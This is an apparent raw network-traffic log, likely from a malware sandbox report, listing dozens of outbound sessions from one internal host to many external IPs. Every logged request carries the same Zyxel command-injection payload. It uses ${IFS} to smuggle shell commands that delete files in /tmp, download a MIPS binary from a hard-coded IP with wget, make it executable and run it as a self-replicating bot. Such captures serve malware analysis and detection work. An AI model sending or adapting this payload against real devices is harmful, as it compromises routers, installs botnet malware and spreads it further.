                                        Jan 14, 2024 16:18:40.354779005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3172192.168.2.1339876171.6.162.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354823112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3173192.168.2.1358542217.98.252.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354871035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3174192.168.2.135470641.255.143.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354912996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3175192.168.2.1347034204.220.245.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354968071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3176192.168.2.133810486.195.209.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.354996920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3177192.168.2.1335874167.81.54.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355051994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3178192.168.2.133491881.97.254.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355093002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3179192.168.2.1358944164.49.218.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355133057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3180192.168.2.1348666155.24.18.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355169058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3181192.168.2.1334996212.2.127.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355222940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3182192.168.2.1346844173.229.110.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355253935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3183192.168.2.1351950177.49.7.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355310917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3184192.168.2.1360854140.217.132.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355346918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3185192.168.2.136050262.22.226.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355393887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3186192.168.2.135589441.109.86.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355432987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3187192.168.2.133428012.171.137.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355460882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3188192.168.2.134162439.99.255.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355494976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3189192.168.2.133744881.47.71.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355554104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3190192.168.2.1353186160.209.224.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355582952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3191192.168.2.1359950101.212.113.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355617046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3192192.168.2.1352072128.210.75.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355679035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3193192.168.2.135431668.204.31.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355704069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3194192.168.2.135577866.203.29.119443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355741024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3195192.168.2.1342626155.208.40.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355807066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3196192.168.2.134057496.9.133.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355832100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3197192.168.2.1338204163.123.134.143443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355916977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3198192.168.2.135668662.255.212.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355953932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3199192.168.2.1338534207.174.140.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.355987072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3200192.168.2.133435453.11.73.55443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.356023073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3201192.168.2.1338432206.32.82.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.356051922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3202192.168.2.135557238.77.145.178443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.356093884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3203192.168.2.1354414212.177.184.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:40.356118917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3204192.168.2.1346414115.147.3.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.368500948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3205192.168.2.135948488.212.19.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.368549109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3206192.168.2.13589284.166.190.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.368590117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3207192.168.2.1358572130.7.192.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.368623972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3208192.168.2.134380664.19.225.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.368679047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3209192.168.2.135600634.234.67.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.368716002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3210192.168.2.1334920115.247.6.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.368757963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3211192.168.2.1354094223.180.131.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.368789911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3212192.168.2.1358536201.163.182.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.368828058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3213192.168.2.1335138153.111.186.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.368872881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3214192.168.2.1337214213.112.122.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.368952036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3215192.168.2.1333136197.81.63.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.368985891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3216192.168.2.133515014.161.158.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369018078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3217192.168.2.134109474.65.181.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369065046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3218192.168.2.134190078.223.14.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369082928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3219192.168.2.1354504130.63.227.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369134903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3220192.168.2.1354872116.76.250.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369191885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3221192.168.2.1360798109.221.45.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369227886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3222192.168.2.1358650149.34.253.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369288921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3223192.168.2.1352666101.239.150.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369323969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3224192.168.2.13439424.37.237.79443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369353056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3225192.168.2.134993459.119.67.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369389057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3226192.168.2.1340110196.36.249.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369426966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3227192.168.2.13603369.232.28.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369461060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3228192.168.2.134944089.253.139.255443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369513035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3229192.168.2.135976614.146.195.245443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369549036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3230192.168.2.133817683.111.10.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369590998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3231192.168.2.135258893.230.60.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369632006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3232192.168.2.135371864.93.94.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369672060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3233192.168.2.135025296.6.144.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.369707108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3234192.168.2.1337304183.171.191.248443
                                        TimestampBytes transferredDirectionData
